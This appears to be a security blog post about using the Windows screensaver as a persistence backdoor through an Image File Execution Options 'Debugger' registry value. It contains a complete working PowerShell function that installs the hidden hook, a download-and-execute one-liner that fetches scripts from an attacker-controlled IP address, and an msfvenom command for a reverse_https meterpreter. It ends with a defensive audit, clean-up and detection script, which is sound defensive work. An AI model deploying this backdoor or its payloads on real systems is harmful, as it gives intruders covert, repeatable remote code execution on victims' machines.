Using Windows Screensaver as a Backdoor with PowerShell

I came across an interesting post about bypassing the Windows lock screen via a Flash screensaver. Bypassing the lock screen is useful, but the method described there needs physical access to the target. The same Windows feature can be used for much more without physical access: because the screensaver runs our payload whenever the target is idle, it makes a handy backdoor.
Let's see!

Using the simple PowerShell command below, from an elevated shell, we can run an executable whenever the screensaver timeout occurs, assuming the screensaver in use is the built-in Ribbons.scr:

[Screenshot: 00.JPG]

And when the timeout occurs we get a command prompt (which may keep running in a loop). Fun, but it still needs physical access!
To quickly test screensaver execution, I used MonitorES from here.
Using PowerShell, we can do some neat stuff with this. For example, with the one-liner below we can download and execute scripts. We can always change the script on the web server, so a new script is executed every time the screensaver starts.
[Screenshot: 00.JPG]
The above can be used to execute PowerShell scripts and modules.
Now, to make it less suspicious to the user, we should launch the screensaver along with our command/script. Let me give you Add-ScrnSaveBackdoor.

Add-ScrnSaveBackdoor

It reads the SCRNSAVE.EXE value under the registry key HKEY_CURRENT_USER\Control Panel\Desktop to find the existing screensaver. If none is set, one of the default screensavers in C:\Windows\System32 is used.
A Debugger for the screensaver is then created under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<screensaver name>. The payload is written to the "Debugger" value of that key, and a screensaver picked from the default ones is appended to the payload, so that when the payload executes the screensaver also runs after it and everything looks legitimate.
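The function below is an added example, not the Nishang source of Add-ScrnSaveBackdoor: it re-creates the mechanism just described (and the download-and-execute one-liner from earlier) in one place, so the moving parts are visible. It must run from an elevated PowerShell because the IFEO key lives under HKLM. Two points a practitioner should notice: IFEO matches on the image file name only, so the debugger is written under the bare `Bubbles.scr`-style name; and the payload deliberately launches a *different* built-in screensaver, because launching the hooked one would hit the same IFEO entry again and re-run the payload in a loop. The URL at the bottom is a placeholder for an attacker-controlled web server.

```powershell
# Added example (not the Nishang source). Run elevated: the IFEO key is under HKLM.
function Add-ScrnSaveDebugger {
    [CmdletBinding()]
    param(
        # PowerShell to run each time the screensaver timeout fires. Use single
        # quotes inside it; it is embedded in a double-quoted -Command string.
        [Parameter(Mandatory)]
        [string]$Payload
    )

    $ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    $desktop  = 'HKCU:\Control Panel\Desktop'

    # 1. Find the user's configured screensaver. SCRNSAVE.EXE holds a path such as
    #    C:\Windows\system32\Bubbles.scr and is absent when "(None)" is selected.
    $current = (Get-ItemProperty -Path $desktop -Name 'SCRNSAVE.EXE' -ErrorAction SilentlyContinue).'SCRNSAVE.EXE'
    if (-not $current) {
        # Nothing to hook: fall back to a built-in one, as the post describes.
        # ScreenSaveActive=1 is assumed to be needed so the timeout actually fires.
        $current = Join-Path $env:SystemRoot 'System32\Ribbons.scr'
        Set-ItemProperty -Path $desktop -Name 'SCRNSAVE.EXE' -Value $current
        Set-ItemProperty -Path $desktop -Name 'ScreenSaveActive' -Value '1'
    }
    # IFEO is keyed on the image file name only, not on the full path.
    $hooked = Split-Path -Path $current -Leaf

    # 2. Pick a *different* built-in screensaver for the user to see. If the
    #    payload launched the hooked one, CreateProcess would consult the same
    #    IFEO entry again and the payload would re-run in a loop.
    $visible = Get-ChildItem -Path (Join-Path $env:SystemRoot 'System32\*.scr') |
        Where-Object { $_.Name -ne $hooked } |
        Select-Object -First 1 -ExpandProperty FullName

    # 3. Build the Debugger command. Windows starts the debugger with the original
    #    command line appended (e.g. "C:\Windows\system32\Bubbles.scr /s"), so the
    #    command ends in '#' to turn that appended text into a PowerShell comment.
    $showSaver = "Start-Process -FilePath '$visible' -ArgumentList '/s'"
    $cmd = "powershell.exe -NoProfile -WindowStyle Hidden -Command `"$Payload; $showSaver; #`""

    # 4. Write the IFEO entry for the hooked screensaver.
    $key = Join-Path $ifeoRoot $hooked
    if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name 'Debugger' -Value $cmd

    [pscustomobject]@{ Hooked = $hooked; Shown = $visible; Debugger = $cmd }
}

# Usage (placeholder URL): fetch and run a script from the attacker's web server on
# every screensaver start; swap the file on the server to change what runs next time.
Add-ScrnSaveDebugger -Payload "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.254.226/run.ps1'))"
```

The function returns the image name it hooked, the screensaver it will show, and the exact Debugger string written, which is also what you need in order to clean up afterwards (delete the Debugger value, and the subkey if it is otherwise empty).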
The command below shows how to use Add-ScrnSaveBackdoor to execute FireBuster from Nishang for egress testing. FireListener must be started on the attacker's machine first:
[Screenshot: 01.JPG]
The command below executes HTTP-Backdoor from Powerpreter:
[Screenshot: 02.JPG]
And the command below executes an in-memory meterpreter in PowerShell format generated with msfvenom (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell):
[Screenshot: 03.JPG]
Aaaand…

Bingo! With the help of PowerShell, we have turned a method that required physical access into one that gives remote access. It works fine with the "On resume, display logon screen" setting. We can always change the contents of the script at the URL to execute different scripts through the same backdoor.
The source for Add-ScrnSaveBackdoor can be found in the Nishang GitHub repo.
The video below walks through the source code and shows Add-ScrnSaveBackdoor in action, popping a reverse_https meterpreter.

Meh!

Administrative privilege (an elevated shell) is required to use Add-ScrnSaveBackdoor.
That SCRNSAVE.EXE can be used for evil has been known for a long time: http://www.securityfocus.com/archive/1/434926/30/0/threaded
That "Image File Execution Options" can be used for evil is also known, so AV *may* catch it.
This setting "can be superseded by the No screen saver Group Policy".
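Since both registry locations are well known, the defender's side of this is worth showing too. The script below is an added example, not part of the original post or of Nishang: it lists IFEO Debugger values attached to screensaver images, checks every loaded user hive for a SCRNSAVE.EXE that points outside System32 (the older abuse referenced above), and removes a hooked entry. The regex used to mark an entry as suspicious is a heuristic of my own; legitimate debuggers on .scr images are rare enough that any hit deserves a look. Run it elevated.

```powershell
# Added example (not from the original post): audit and clean-up for the
# screensaver IFEO technique. Run elevated to read all hives and write HKLM.
$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Get-ScrnSaveDebugger {
    # Any .scr subkey with a Debugger value is suspect: screensavers are not
    # normally debugged, and a hidden PowerShell/cmd launcher is a giveaway.
    Get-ChildItem -Path $IfeoRoot -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -like '*.scr' } |
        ForEach-Object {
            $dbg = (Get-ItemProperty -Path $_.PSPath -Name 'Debugger' -ErrorAction SilentlyContinue).Debugger
            if ($dbg) {
                [pscustomobject]@{
                    Image      = $_.PSChildName
                    Debugger   = $dbg
                    # Heuristic (my own): launcher names and download-cradle markers.
                    Suspicious = [bool]($dbg -match 'powershell|cmd\.exe|WindowStyle Hidden|DownloadString|IEX|-enc')
                }
            }
        }
}

function Get-UserScreenSaver {
    # HKEY_USERS holds the hives of currently loaded profiles; HKCU is only the
    # current user. A SCRNSAVE.EXE outside System32 is the older abuse pattern.
    $sys32 = Join-Path $env:SystemRoot 'System32'
    Get-ChildItem -Path 'Registry::HKEY_USERS' |
        Where-Object { $_.PSChildName -notlike '*_Classes' } |
        ForEach-Object {
            $desktop = "Registry::HKEY_USERS\$($_.PSChildName)\Control Panel\Desktop"
            $scr = (Get-ItemProperty -Path $desktop -Name 'SCRNSAVE.EXE' -ErrorAction SilentlyContinue).'SCRNSAVE.EXE'
            if ($scr) {
                [pscustomobject]@{
                    Sid          = $_.PSChildName
                    ScreenSaver  = $scr
                    OutsideSys32 = -not ($scr -like "$sys32\*")
                }
            }
        }
}

function Remove-ScrnSaveDebugger {
    param([Parameter(Mandatory)][string]$Image)   # e.g. 'Bubbles.scr'
    $key = Join-Path $IfeoRoot $Image
    Remove-ItemProperty -Path $key -Name 'Debugger' -ErrorAction SilentlyContinue
    # Drop the subkey as well if nothing else is left in it.
    $k = Get-Item -Path $key -ErrorAction SilentlyContinue
    if ($k -and $k.ValueCount -eq 0 -and $k.SubKeyCount -eq 0) {
        Remove-Item -Path $key -Recurse -Force
    }
}

# Usage: report both locations, then remove whatever was flagged.
Get-ScrnSaveDebugger | Format-Table -AutoSize
Get-UserScreenSaver | Where-Object OutsideSys32 | Format-Table -AutoSize
Get-ScrnSaveDebugger | Where-Object Suspicious | ForEach-Object { Remove-ScrnSaveDebugger -Image $_.Image }
```

For catching the write as it happens rather than after the fact, a Sysmon registry value-set event (Event ID 13) whose TargetObject falls under Image File Execution Options and ends in \Debugger is the natural rule; Sysinternals Autoruns also lists these entries under its Image Hijacks tab.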